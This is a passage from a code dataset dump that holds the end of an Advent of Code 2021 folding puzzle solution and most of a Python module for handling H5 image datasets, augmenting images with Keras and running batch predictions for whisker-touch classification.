c.split(\",\"))) for c in coords_section.splitlines()}\nfolds = [re.match(r\"fold along (x|y)=(\\d+)\", f).groups() for f in folds_section.splitlines()]\nfolds = [(a, int(v)) for a, v in folds]\n\nfor axis, v in folds:\n if axis == 'y':\n coords = {(x, y) for x, y in coords if y < v} | {(x, v - (y - v)) for x, y in coords if y >= v}\n elif axis == 'x':\n coords = {(x, y) for x, y in coords if x < v} | {(v - (x - v), y) for x, y in coords if x >= v}\n\nX, Y = max(c[0] for c in coords), max(c[1] for c in coords)\ngrid = np.zeros((X + 1, Y + 1), dtype=int)\nfor c in coords:\n grid[c] = 1\nimwrite(\"day-13/grid.png\", grid.T)\n# CPJBERUL\n","repo_name":"ebouteillon/advent-of-code-2021","sub_path":"day-13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17022832691","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport h5py\nimport copy\nimport time\nimport os\nfrom whacc import utils\nfrom pathlib import Path\nimport warnings\nfrom tqdm.autonotebook import tqdm\nimport pdb\nfrom IPython.utils import io\n\n\n# def tqdm_import_helper():\n# with io.capture_output() as captured: # prevent crazy printing\n# from tqdm.notebook import tqdm\n# try:\n# for k in tqdm(range(1)):\n# pass\n# return True and isnotebook()\n# except:\n# return False\n\ndef isnotebook():\n try:\n c = str(get_ipython().__class__)\n shell = get_ipython().__class__.__name__\n if 'colab' in c:\n return True\n elif shell == 'ZMQInteractiveShell':\n return True # Jupyter notebook or qtconsole\n elif shell == 'TerminalInteractiveShell':\n return False # Terminal running IPython\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n\n# if tqdm_import_helper():\n# from tqdm.notebook import tqdm\n# else:\n# from tqdm import tqdm\n\ndef stack_imgs_lag(imgs, frames_1=None, buffer=2, shift_to_the_right_by=0):\n if frames_1 is None:\n frames_1 = [imgs.shape[0]]\n array_group = []\n for k1, k2 in utils.loop_segments(frames_1):\n x = (np.random.random(imgs[0].shape) * 255).astype(np.uint8)\n tile_axes = [1] * len(x.shape) + [buffer]\n x = np.tile(x[:, :, None], tile_axes)\n tmp1 = x.copy()\n for ii, stack_i in enumerate(range(k1, k2)):\n x = np.concatenate((x, imgs[stack_i][:, :, None]), axis=2)\n x = np.concatenate((x, tmp1), axis=2)\n for k3 in range(k2 - k1):\n array_group.append(x[:, :, k3 + shift_to_the_right_by: k3 + 1 + buffer + shift_to_the_right_by])\n return np.asarray(array_group)\n\n\ndef get_h5_key_and_concatenate(h5_list, key_name='labels'):\n \"\"\"\n simply extract and concatenate all of one key \"key_name\" from many H5 files, I use it to get balance the data touch\n and not touch frames when training a model with a list of different H5 files\n Parameters\n ----------\n h5_list : list\n list of full paths to H5 file(s).\n key_name : str\n default 'labels', the key to get the data from the H5 file\n\n \"\"\"\n h5_list = utils.make_list(h5_list, suppress_warning=True)\n for i, k in enumerate(h5_list):\n with h5py.File(k, 'r') as h:\n try:\n x = h[key_name][:]\n except:\n x = h[key_name]\n\n if i == 0:\n out = np.asarray(x)\n else:\n out = np.concatenate((out, x))\n return out\n\n\ndef get_h5_key_and_dont_concatenate(h5_list, key_name='labels'):\n \"\"\"\n simply extract and concatenate all of one key \"key_name\" from many H5 files, I use it to get balance the data touch\n and not touch frames when training a model with a list of different H5 files\n Parameters\n ----------\n h5_list : list\n list of full paths to H5 file(s).\n key_name : str\n default 'labels', the key to get the data from the H5 file\n\n \"\"\"\n out = []\n for i, k in enumerate(h5_list):\n with h5py.File(k, 'r') as h:\n out.append(list(h[key_name][:]))\n return out\n\n\ndef clone_h5_basic_info(H5_list, fold_name=None, file_end='_QUICK_SAVE.h5'):\n \"\"\"\n copies all the info form H5 into another H5 file NOT INCLUDING the labels or images. so it have all the file info,\n like names and pole locations and polate match max value stack. anything with 'images' , 'MODEL__' or 'labels' is\n not copied over to the new file.\n Parameters\n ----------\n H5_list : list\n list of H5 files to clone\n fold_name : str\n default None, where to place the cloned H5 files. if left blank it will place in the same folder as the original file\n file_end : str\n default '_QUICK_SAVE.h5', how to change the name of the H5 file to be cloned to differentiate it from the original\n Returns\n -------\n all_new_h5s: list\n list of new H5 full file names\n \"\"\"\n if fold_name is not None:\n try:\n os.mkdir(fold_name)\n except:\n pass\n all_new_h5s = []\n\n for h5 in H5_list:\n if fold_name is not None:\n new_fn = fold_name + os.path.sep + os.path.basename(h5)[:-3] + file_end\n else: #\n new_fn = os.path.dirname(h5) + os.path.sep + os.path.basename(h5)[:-3] + file_end\n all_new_h5s.append(new_fn)\n try:\n os.remove(new_fn)\n except:\n pass\n with h5py.File(new_fn, 'w') as f1:\n with h5py.File(h5, 'r') as f2:\n for i, k in enumerate(f2.keys()):\n if 'images' != k and 'MODEL__' not in k and 'labels' not in k:\n f1.create_dataset(k, data=f2[k][:])\n f2.close()\n f1.close()\n return all_new_h5s\n\n\ndef del_h5_with_term(h5_list, str_2_cmp):\n \"\"\"\n Parameters\n ----------\n h5_list : list\n list of H5 strings (full path)\n str_2_cmp : str\n will delete keys with this in their title ... e.g. '__RETRAIN'\n \"\"\"\n for k2 in h5_list:\n with h5py.File(k2, 'a') as h5_source:\n for k in h5_source.keys():\n if str_2_cmp in k:\n print('del--> ' + k)\n del h5_source[k]\n print('_______')\n\n\ndef split_h5_loop_segments(h5_to_split_list, split_percentages, temp_base_name, chunk_size=10000,\n add_numbers_to_name=True,\n disable_TQDM=False, set_seed=None, color_channel=True, force_random_each_frame=False):\n \"\"\"Randomly splits images from a list of H5 file(s) into len(split_percentages) different H5 files.\n\n Parameters\n ----------\n h5_to_split_list : list\n list of strings with full file names to the H5 file(s) to be split\n split_percentages : list\n list of numbers, can be ints [20, 1, 1] and or floats [.8, .2], it simply takes the sum and creates a percentage\n temp_base_name : str or list\n full path to new h5 file e.g \"'/Users/phil/tempH5_\" and the program will add the number and the \".h5\"\n in this case tempH5_0.h5, tempH5_1.h5, tempH5_2.h5 etc. or if it is a list it must be equal in length to\n 'split_percentages' and each file will be named based on that list\n chunk_size = int\n default 10000, max amount of frames to hold in memory at a time before storing in H5 file. Should almost never\n be an issue but just in case you can set to a lower value if you experience memory issues.\n add_numbers_to_name = bool\n default true, just in case you don't want the numbers on the end of your h5 file.\n Returns\n Examples\n --------\n from whacc import image_tools, utils\n h5_to_split_list = \"/Users/phil/Downloads/untitled folder 2/AH0000x000000_small_tester.h5\"\n h5_to_split_list = [h5_to_split_list]\n utils.print_h5_keys(h5_to_split_list[0])\n bd = '/Users/phil/Downloads/untitled folder 2/'\n image_tools.split_h5_loop_segments(h5_to_split_list, [1, 3], [bd+'TRASH', bd+'TRASH2'], chunk_size=10000, add_numbers_to_name=False,\n disable_TQDM=False, set_seed = None)\n -------\n \"\"\"\n if isinstance(temp_base_name, str):\n temp_base_name = [temp_base_name] * len(split_percentages)\n else:\n assert len(temp_base_name) == len(\n split_percentages), \"\"\"if 'temp_base_name' is a list of strings, it must be equal in length to 'split_percentages'\"\"\"\n\n for i, k in enumerate(temp_base_name):\n if k[-3:] == '.h5':\n temp_base_name[i] = temp_base_name[i][:-3]\n\n frame_num_array_list = get_h5_key_and_dont_concatenate(h5_to_split_list, 'frame_nums')\n if force_random_each_frame:\n for i, k in enumerate(frame_num_array_list):\n frame_num_array_list[i] = list(np.ones(np.sum(k)).astype(int))\n\n total_frames = len(get_h5_key_and_concatenate(h5_to_split_list, key_name='labels'))\n cnt1 = 0\n h5_creators = dict()\n split_percentages = split_percentages / np.sum(split_percentages)\n # assert(sum(split_percentages)==1)\n final_names = []\n for iii, h5_to_split in enumerate(h5_to_split_list):\n with h5py.File(h5_to_split, 'r') as h:\n tmp_frame_list = frame_num_array_list[iii]\n L = len(tmp_frame_list)\n\n if set_seed is not None:\n np.random.seed(set_seed)\n mixed_inds = np.random.choice(L, L, replace=False)\n\n random_segment_inds = np.split(mixed_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int'))\n random_segment_inds = [sorted(tmpk) for tmpk in random_segment_inds]\n random_frame_inds = [[None]] * len(random_segment_inds)\n list_of_new_frame_nums = [[None]] * len(random_segment_inds)\n loop_seg_list = list(utils.loop_segments(tmp_frame_list))\n for pi, p in enumerate(random_segment_inds):\n tmp1 = []\n tmp2 = []\n for pp in p:\n x = list(loop_seg_list[pp])\n tmp1 += list(range(x[0], x[1]))\n tmp2.append(tmp_frame_list[pp])\n random_frame_inds[pi] = tmp1\n list_of_new_frame_nums[pi] = tmp2\n\n for i, k in enumerate(split_percentages): # for each new h5 created\n if iii == 0: # create the H5 creators\n if add_numbers_to_name:\n final_names.append(temp_base_name[i] + '_' + str(i) + '.h5')\n else:\n final_names.append(temp_base_name[i] + '.h5')\n h5_creators[i] = h5_iterative_creator(final_names[-1],\n overwrite_if_file_exists=True,\n close_and_open_on_each_iteration=True,\n color_channel=color_channel)\n ims = []\n labels = []\n for ii in tqdm(sorted(random_frame_inds[i]), disable=disable_TQDM, total=total_frames, initial=cnt1):\n cnt1 += 1\n ims.append(h['images'][ii])\n labels.append(h['labels'][ii])\n if ii > 0 and ii % chunk_size == 0:\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n ims = []\n labels = []\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n with h5py.File(h5_creators[i].h5_full_file_name,\n 'r+') as h2: # wanted to do this to allow NONE as input and still have frame nums, but I need to have an append after creating and its a pain\n frame_nums = np.asarray(list_of_new_frame_nums[i])\n if 'frame_nums' not in h2.keys():\n h2.create_dataset('frame_nums', shape=np.shape(frame_nums), maxshape=(None,), chunks=True,\n data=frame_nums)\n else:\n h2['frame_nums'].resize(h2['frame_nums'].shape[0] + frame_nums.shape[0], axis=0)\n h2['frame_nums'][-frame_nums.shape[0]:] = frame_nums\n # # add the frame info to each\n # for i, frame_nums in enumerate(list_of_new_frame_nums):\n # with h5py.File(h5_creators[i].h5_full_file_name, 'r+') as h:\n # h.create_dataset('frame_nums', shape=np.shape(frame_nums), data=frame_nums)\n return final_names\n\n\ndef make_sure_frame_nums_exist(h5file):\n with h5py.File(h5file, 'r+') as h:\n key_list = list(h.keys())\n if 'frame_nums' in key_list:\n print(\"\"\"'frame_nums' already in the key list\"\"\")\n return None\n if 'trial_nums_and_frame_nums' not in key_list:\n print(\n \"\"\"key 'trial_nums_and_frame_nums' must be in the provided h5 this is the only reason program exists\"\"\")\n return None\n frame_nums = h['trial_nums_and_frame_nums'][1, :]\n h.create_dataset('frame_nums', shape=np.shape(frame_nums), data=frame_nums)\n\n\ndef split_h5(h5_to_split_list, split_percentages, temp_base_name, chunk_size=10000, add_numbers_to_name=True,\n disable_TQDM=False, skip_if_label_is_neg_1=False, set_seed=None, color_channel=True):\n \"\"\"Randomly splits images from a list of H5 file(s) into len(split_percentages) different H5 files.\n\n Parameters\n ----------\n h5_to_split_list : list\n list of strings with full file names to the H5 file(s) to be split\n split_percentages : list\n list of numbers, can be ints [20, 1, 1] and or floats [.8, .2], it simply takes the sum and creates a percentage\n temp_base_name : str or list\n full path to new h5 file e.g \"'/Users/phil/tempH5_\" and the program will add the number and the \".h5\"\n in this case tempH5_0.h5, tempH5_1.h5, tempH5_2.h5 etc. or if it is a list it must be equal in length to\n 'split_percentages' and each file will be named based on that list\n chunk_size = int\n default 10000, max amount of frames to hold in memory at a time before storing in H5 file. Should almost never\n be an issue but just in case you can set to a lower value if you experience memory issues.\n add_numbers_to_name = bool\n default true, just in case you don't want the numbers on the end of your h5 file.\n Returns\n -------\n \"\"\"\n if isinstance(temp_base_name, str):\n temp_base_name = [temp_base_name] * len(split_percentages)\n else:\n assert len(temp_base_name) == len(\n split_percentages), \"\"\"if 'temp_base_name' is a list of strings, it must be equal in length to 'split_percentages'\"\"\"\n total_frames = len(get_h5_key_and_concatenate(h5_to_split_list, key_name='labels'))\n cnt1 = 0\n h5_creators = dict()\n split_percentages = split_percentages / np.sum(split_percentages)\n # assert(sum(split_percentages)==1)\n final_names = []\n for iii, h5_to_split in enumerate(h5_to_split_list):\n with h5py.File(h5_to_split, 'r') as h:\n L = len(h['labels'][:])\n if set_seed is not None:\n np.random.seed(set_seed)\n mixed_inds = np.random.choice(L, L, replace=False)\n if skip_if_label_is_neg_1: # remove -1s\n mixed_inds = mixed_inds[mixed_inds != -1]\n random_frame_inds = np.split(mixed_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int'))\n for i, k in enumerate(split_percentages):\n if iii == 0: # create the H5 creators\n if add_numbers_to_name:\n final_names.append(temp_base_name[i] + '_' + str(i) + '.h5')\n else:\n final_names.append(temp_base_name[i] + '.h5')\n h5_creators[i] = h5_iterative_creator(final_names[-1],\n overwrite_if_file_exists=True,\n close_and_open_on_each_iteration=True,\n color_channel=color_channel)\n ims = []\n labels = []\n # print('starting ' + str(iii*i + 1) + ' of ' + str(len(split_percentages)*len(h5_to_split_list)))\n for ii in tqdm(sorted(random_frame_inds[i]), disable=disable_TQDM, total=total_frames, initial=cnt1):\n cnt1 += 1\n ims.append(h['images'][ii])\n labels.append(h['labels'][ii])\n if ii > 0 and ii % chunk_size == 0:\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n ims = []\n labels = []\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n return final_names\n\n\nclass h5_iterative_creator():\n \"\"\"Create an H5 file using a for loop easily. used to create the augmented H5 file for training\n \n Attributes:\n\n Parameters\n ----------\n h5_new_full_file_name : string\n full path name to your H5 file to be created\n overwrite_if_file_exists : bool\n overwrites the h5 file if it already exists\n max_img_height : int\n default 61, only the max size, can be larger in case you are going to have larger images\n max_img_width : int\n default 61, only the max size, can be larger in case you are going to have larger images\n close_and_open_on_each_iteration : bool\n default True, this prevents the user from forgetting to close H5 which\n can lead to corruption.\n\n Example\n _______\n h5creator = h5_iterative_creator(new_H5_file)\n h5creator.add_to_h5(img_stack1, labels_stack1)\n h5creator.add_to_h5(img_stack2, labels_stack2)\n h5creator.add_to_h5(img_stack3, labels_stack3)\n\n \"\"\"\n\n def __init__(self, h5_new_full_file_name,\n overwrite_if_file_exists=False,\n max_img_height=61,\n max_img_width=61,\n close_and_open_on_each_iteration=True,\n color_channel=True,\n add_to_existing_H5=False,\n ignore_image_range_warning=False,\n dtype_img=h5py.h5t.STD_U8BE,\n dtype_labels=h5py.h5t.STD_I32LE,\n image_key_name = 'images',\n label_key_name = 'labels'):\n self.img_key = image_key_name\n self.label_key_name = label_key_name\n self.dtype_img = dtype_img\n self.dtype_labels = dtype_labels\n self.ignore_image_range_warning = False\n self.max_shape = None\n if not close_and_open_on_each_iteration:\n print('**remember to CLOSE the H5 file when you are done!!!**')\n if overwrite_if_file_exists and os.path.isfile(h5_new_full_file_name):\n os.remove(h5_new_full_file_name)\n self.h5_full_file_name = h5_new_full_file_name\n if add_to_existing_H5:\n self.hf_file = h5py.File(h5_new_full_file_name, \"r+\")\n else:\n self.hf_file = h5py.File(h5_new_full_file_name, \"w\")\n self.color_channel = color_channel\n self.max_img_height = max_img_height\n self.max_img_width = max_img_width\n self._went_through_create_h5 = False\n self.close_it = close_and_open_on_each_iteration\n if self.close_it:\n self.hf_file.close()\n\n def add_to_h5(self, images, labels):\n \"\"\"\n Parameters\n ----------\n images : numpy tensor\n chunk of images\n labels : numpy array\n array oof labels\n \"\"\"\n if self.close_it:\n self.open_or_close_h5('r+')\n if self._went_through_create_h5: # already initialized with the correct size\n self._add_next_chunk_to_h5(images, labels)\n else:\n self._create_h5(images, labels)\n if self.close_it:\n self.open_or_close_h5('close')\n\n def check_images_uint8(self, images):\n if not self.ignore_image_range_warning:\n min_img = np.min(images)\n max_img = np.max(images)\n if min_img < 0 or max_img > 255:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n if -1 <= min_img <= 1 and -1 <= max_img <= 1:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n warnings.warn('it seems your values may be formatted between -1 and 1')\n if 0 <= min_img <= 1 and 0 <= max_img <= 1:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n warnings.warn('it seems your values may be formatted between 0 and 1')\n\n def _create_h5(self, images, labels):\n \"\"\"\n Parameters\n ----------\n images :\n\n labels :\n\n \"\"\"\n self.check_images_uint8(images)\n if self.max_shape is None:\n # max_shape = (None, self.max_img_height, self.max_img_width, 3)\n max_shape = list(images.shape)\n max_shape[0] = None\n\n # if set_multiplier:\n self.hf_file.create_dataset(\"multiplier\", [1], h5py.h5t.STD_I32LE, data=images.shape[0])\n if self.color_channel:\n self.hf_file.create_dataset(self.img_key,\n np.shape(images),\n self.dtype_img,\n # jk need this to not explode the size of the data... commented this out because I wanted to use not 0-255 numbers\n maxshape=max_shape,\n chunks=True,\n data=images)\n else:\n self.hf_file.create_dataset(self.img_key,\n np.shape(images),\n self.dtype_img,\n # jk need this to not explode the size of the data... commented this out because I wanted to use not 0-255 numbers\n maxshape=max_shape,\n chunks=True,\n data=images)\n self.hf_file.create_dataset(self.label_key_name,\n np.shape(labels),\n self.dtype_labels, # ....... commented this out because we may want floats....\n maxshape=(None,),\n chunks=True,\n data=labels)\n self._went_through_create_h5 = True\n\n def _add_next_chunk_to_h5(self, images, labels):\n \"\"\"\n\n Parameters\n ----------\n images :\n\n labels :\n \n\n Returns\n -------\n\n \n \"\"\"\n self.check_images_uint8(images)\n self.hf_file[self.img_key].resize(self.hf_file[self.img_key].shape[0] + images.shape[0], axis=0)\n self.hf_file[self.label_key_name].resize(self.hf_file[self.label_key_name].shape[0] + labels.shape[0], axis=0)\n\n self.hf_file[self.img_key][-images.shape[0]:] = images\n self.hf_file[self.label_key_name][-labels.shape[0]:] = labels\n\n def read_h5(self):\n \"\"\" \"\"\"\n self.open_or_close_h5('r')\n print('''**remember to CLOSE the H5 file when you are done!!!** with \".close_h5()\" method''')\n\n def close_h5(self):\n \"\"\" \"\"\"\n self.open_or_close_h5('close')\n print('H5 file was closed')\n\n def open_or_close_h5(self, mode_='r'):\n \"\"\"\n\n Parameters\n ----------\n mode_ : str\n mode can be H5py modes 'r', 'r+' 'w' (w overwrites file!) etc OR 'close' to\n # ensure it is closed. separate function to prevent a bunch of try statements (Default value = 'r')\n\n Returns\n -------\n\n \n \"\"\"\n try:\n self.hf_file.close()\n finally:\n if mode_.lower() != 'close':\n self.hf_file = h5py.File(self.h5_full_file_name, mode_)\n\n\n#\ndef augment_helper(keras_datagen, num_aug_ims, num_reg_ims, in_img, in_label):\n \"\"\"\n\n Parameters\n ----------\n keras_datagen : keras_datagen: keras_datagen: keras.preprocessing.image.ImageDataGenerator\n from keras.preprocessing.image import ImageDataGenerator-- keras_datagen = ImageDataGenerator(...)\n num_aug_ims : int\n number of augmented images to generate from single input image\n num_reg_ims : int\n number of copies of in_img (original) to produce for output. will be stacked at the beginning of all_augment variable.\n Use dot see augmentation when testing and can be useful if splitting into many H5s if you want an original in each.\n in_img : numpy array\n numpy array either 3D with color channel for the last dim ot 2D\n in_label : int\n the label associate with in_img. simply repeats it creating 'out_labels' the be size of 'all_augment'\n\n Returns\n -------\n\n \n \"\"\"\n if len(in_img.shape) == 2: # or not np.any(np.asarray(in_img.shape)==3)\n in_img = np.repeat(in_img[..., np.newaxis], 3, -1) # for 2D arrays without color channels\n set_zoom = keras_datagen.zoom_range\n in_img = np.expand_dims(in_img, 0)\n\n it = keras_datagen.flow(in_img, batch_size=1)\n all_augment = np.tile(in_img, [num_reg_ims, 1, 1, 1])\n for i in range(num_aug_ims): ##\n if set_zoom != [0, 0]: # if zoom is being used...\n # keras 'zoom' is annoying. it zooms x and y differently randomly\n # in order to get an equal zoom I use the following workaround.\n z_val = np.random.uniform(low=set_zoom[0], high=set_zoom[1])\n keras_datagen.zoom_range = [z_val, z_val]\n it = keras_datagen.flow(in_img, batch_size=1)\n batch = it.next()\n image = batch[0].astype('uint8')\n all_augment = np.append(all_augment, np.expand_dims(image, 0), 0)\n out_labels = np.repeat(in_label, sum([num_aug_ims, num_reg_ims]))\n keras_datagen.zoom_range = set_zoom\n return all_augment, out_labels\n\n\ndef img_unstacker(img_array, num_frames_wide=8, color_channel=True):\n \"\"\"unstacks image stack and combines them into one large image for easy display. reads left to right and then top to bottom.\n\n Parameters\n ----------\n img_array : numpy array\n stacked image array\n num_frames_wide : int\n width of destacked image. if = 8 with input 20 images it will be 8 wide 3 long and 4 blank images (Default value = 8)\n\n Returns\n -------\n\n \n \"\"\"\n im_stack = None\n for i, k in enumerate(img_array):\n if i % num_frames_wide == 0:\n if i != 0: # stack it\n if im_stack is None:\n im_stack = im_stack_tmp\n else:\n im_stack = np.vstack((im_stack, im_stack_tmp))\n im_stack_tmp = k # must be at the end\n else:\n im_stack_tmp = np.hstack((im_stack_tmp, k))\n x = num_frames_wide - len(img_array) % num_frames_wide\n if x != 0:\n if x != num_frames_wide:\n for i in range(x):\n im_stack_tmp = np.hstack((im_stack_tmp, np.ones_like(k)))\n if im_stack is None:\n return im_stack_tmp\n else:\n im_stack = np.vstack((im_stack, im_stack_tmp))\n return im_stack\n\n\ndef original_image(x):\n \"\"\"This is used to transform batch generated images [-1 1] to the original image [0,255] for plotting\n\n Parameters\n ----------\n x :\n \n\n Returns\n -------\n\n \n \"\"\"\n image = tf.cast((x + 1) * 127.5, tf.uint8)\n return image\n\n\ndef predict_multiple_H5_files(H5_file_list, model_2_load, append_model_and_labels_to_name_string=False,\n batch_size=1000, model_2_load_is_model=False, save_on=False,\n label_save_name=None, disable_TQDM=False,\n save_labels_to_this_h5_file_instead=None) -> object:\n \"\"\"\n\n Parameters\n ----------\n H5_file_list : list: list\n list of string(s) of H5 file full paths\n model_2_load : param append_model_and_labels_to_name_string: if True label_save_name = 'MODEL__' + label_save_name + '__labels',\n \n it is a simple way to keep track of labels form many models in a single H5 file. also make sit easier to find :\n \n those labels for later processing. :\n either full path to model folder ending with \".ckpt\" OR the loaded model itself. if the later,\n the user MUST set \"model_2_load_is_model\" is True and \"label_save_name\" must be explicitly defined (when using model\n path we use the model name to name the labels).\n append_model_and_labels_to_name_string : bool\n if True label_save_name = 'MODEL__' + label_save_name + '__labels',it is a simple way to keep track of labels\n form many models in a single H5 file. also make sit easier to find those labels for later processing. (Default value = False)\n batch_size : int\n number of images to process per batch, -- slower prediction speeds << ideal predictionsspeed <<\n memory issues and crashes -- 1000 is normally pretty good on Google CoLab (Default value = 1000)\n model_2_load_is_model : bool\n lets the program know if you are directly inserting a model (instead of a path to model folder) (Default value = False)\n save_on : bool\n saves to H5 file. either the original H5 (image source) or new H5 if a path to \"save_labels_to_this_h5_file_instead\"\n is given (Default value = False)\n label_save_name : string\n h5 file key used to save the labels to, default is 'MODEL__' + **model_name** + '__labels'\n disable_TQDM : bool\n if True, turns off loading progress bar. (Default value = False)\n save_labels_to_this_h5_file_instead : string\n full path to H5 file to insert labels into instead of the H5 used as the image source (Default value = None)\n\n Returns\n -------\n\n \n \"\"\"\n for i, H5_file in enumerate(H5_file_list):\n # save_what_is_left_of_your_h5_file(H5_file, do_del_and_rename = 1) # only matters if file is corrupt otherwise doesnt touch it\n\n gen = ImageBatchGenerator(batch_size, [H5_file])\n\n if model_2_load_is_model:\n if label_save_name is None and save_on == True:\n assert 1 == 0, 'label_save_name must be assigned if you are loading a model in directly and saveon == True.'\n model = model_2_load\n else:\n if label_save_name is None:\n label_save_name = model_2_load.split(os.path.sep)[-1].split('.')[0]\n label_save_name = 'MODEL__' + label_save_name + '__labels'\n append_model_and_labels_to_name_string = False # turn off because defaults to this naming scheme if user doesnt put in name\n model = tf.keras.models.load_model(model_2_load)\n\n if append_model_and_labels_to_name_string:\n label_save_name = 'MODEL__' + label_save_name + '__labels'\n\n start = time.time()\n labels_2_save = np.asarray([])\n\n for k in tqdm(range(gen.__len__()), disable=disable_TQDM):\n TMP_X, tmp_y = gen.getXandY(k)\n outY = model.predict(TMP_X)\n labels_2_save = np.append(labels_2_save, outY)\n total_seconds = time.time() - start\n time_per_mil = np.round(1000000 * total_seconds / len(labels_2_save))\n print(str(time_per_mil) + ' seconds per 1 million images predicted')\n\n if save_on:\n if save_labels_to_this_h5_file_instead is not None: # add to differnt H5 file\n H5_file = save_labels_to_this_h5_file_instead # otherwise it will add to the current H5 file\n # based on the loop through \"H5_file_list\" above\n try:\n hf.close()\n except:\n pass\n with h5py.File(H5_file, 'r+') as hf:\n try:\n del hf[label_save_name]\n time.sleep(10) # give time to process the deleted file... maybe???\n hf.create_dataset(label_save_name, data=np.float64(labels_2_save))\n except:\n hf.create_dataset(label_save_name, data=np.float64(labels_2_save))\n hf.close()\n return labels_2_save\n\n\ndef get_total_frame_count(h5_file_list):\n \"\"\"\n\n Parameters\n ----------\n h5_file_list :\n \n\n Returns\n -------\n\n \n \"\"\"\n total_frame_count = []\n for H5_file in h5_file_list:\n with h5py.File(H5_file, 'r') as H5:\n total_frame_count.append(H5['images'].shape[0])\n\n return total_frame_count\n\n\ndef batch_size_file_ind_selector(num_in_each, batch_size):\n \"\"\"batch_size_file_ind_selector - needed for ImageBatchGenerator to know which H5 file index\n to use depending on the iteration number used in __getitem__ in the generator.\n this all depends on the variable batch size.\n \n Example: the output of the following...\n batch_size_file_ind_selector([4000, 4001, 3999], [2000])\n would be [0, 0, 1, 1, 1, 2, 2] which means that there are 2 chunks in the first\n H5 file, 3 in the second and 2 in the third based on chunk size of 2000\n\n Parameters\n ----------\n num_in_each :\n param batch_size:\n batch_size :\n \n\n Returns\n -------\n\n \n \"\"\"\n break_into = np.ceil(np.array(num_in_each) / batch_size)\n extract_inds = np.array([])\n for k, elem in enumerate(break_into):\n tmp1 = np.array(np.ones(np.int(elem)) * k)\n extract_inds = np.concatenate((extract_inds, tmp1), axis=0)\n return extract_inds\n\n\n# file_inds_for_H5_extraction is the same as extract_inds output from the above function\ndef reset_to_first_frame_for_each_file_ind(file_inds_for_H5_extraction):\n \"\"\"reset_to_first_frame_for_each_file_ind - uses the output of batch_size_file_ind_selector\n to determine when to reset the index for each individual H5 file. using the above example\n the out put would be [0, 0, 2, 2, 2, 5, 5], each would be subtracted from the indexing to\n set the position of the index to 0 for each new H5 file.\n\n Parameters\n ----------\n file_inds_for_H5_extraction :\n \n\n Returns\n -------\n\n \n \"\"\"\n subtract_for_index = []\n for k, elem in enumerate(file_inds_for_H5_extraction):\n tmp1 = np.diff(file_inds_for_H5_extraction)\n tmp1 = np.where(tmp1 != 0)\n tmp1 = np.append(-1, tmp1[0]) + 1\n subtract_for_index.append(tmp1[np.int(file_inds_for_H5_extraction[k])])\n return subtract_for_index\n\n\nclass ImageBatchGenerator(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, batch_size, h5_file_list, label_key='labels'):\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = 96\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def __getitem__(self, num_2_extract):\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n with h5py.File(H5_file, 'r') as H5:\n # H5 = h5py.File(H5_file, 'r')\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n H5.close()\n return rgb_tensor, raw_Y\n\n # def __getitem__(self, num_2_extract):\n # b = self.batch_size\n # h = self.H5_file_list\n # i = self.file_inds_for_H5_extraction\n # H5_file = h[np.int(i[num_2_extract])]\n # H5 = h5py.File(H5_file, 'r')\n # # list(H5.keys())\n #\n # images = H5['images']\n # num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n # raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n # rgb_tensor = self.image_transform(raw_X)\n #\n # # if self.to_fit:\n # # labels_tmp = H5[self.label_key]\n # # raw_Y = labels_tmp[b*num_2_extract_mod:b*(num_2_extract_mod+1)]\n # # return rgb_tensor, raw_Y\n # # else:\n # return rgb_tensor\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n \n\n Returns\n -------\n\n \n \"\"\"\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n H5 = h5py.File(H5_file, 'r')\n # list(H5.keys())\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n return rgb_tensor, raw_Y\n\n def image_transform(self, 